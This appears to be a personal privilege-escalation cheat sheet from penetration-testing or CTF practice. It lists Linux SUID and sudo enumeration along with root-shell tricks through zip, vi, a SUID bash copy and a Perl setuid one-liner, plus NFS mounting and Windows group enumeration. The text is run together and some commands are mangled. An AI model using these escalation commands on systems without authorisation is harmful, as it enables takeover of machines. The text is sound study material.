Privilege Escalation
Linux
sudo -lto see what sudo can dogtfobins.github.io
get suid binaries:
find / -perm -u=s -type f 2>/dev/nulllaunching shell from suid binary, use
exec /bin/sh -pto keep effective uid from being resetin the case of one machine, there was a binary
.suid_bash, the command./.suid_bash -pgave a root shell
linenum, lse, linpeas
weird zip command if for some reason you have sudo zip privs:
sudo zip test.zip test.txt -T --unzip-command="sh -c /bin/bash"-T tests the integrity of the zip, then --unzip-command specifies the command to unzip the file, so it uses that in the integrity checkcheck sudo environment variables
from sudo vi -
:!shto launch shellcheck ports for nfs
rpcinfo -pchecking strings in files
strings [file]try
-e lalso
cap_setuid+ep
executable-e 'usr POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
mount share:
mkdir [name] $IP`curlftpfs anonymous@$IP [name]
Windows
net localgroup administratorsnet user [username]for groups user belongs tojaws enumeration
download from windows host
Last updated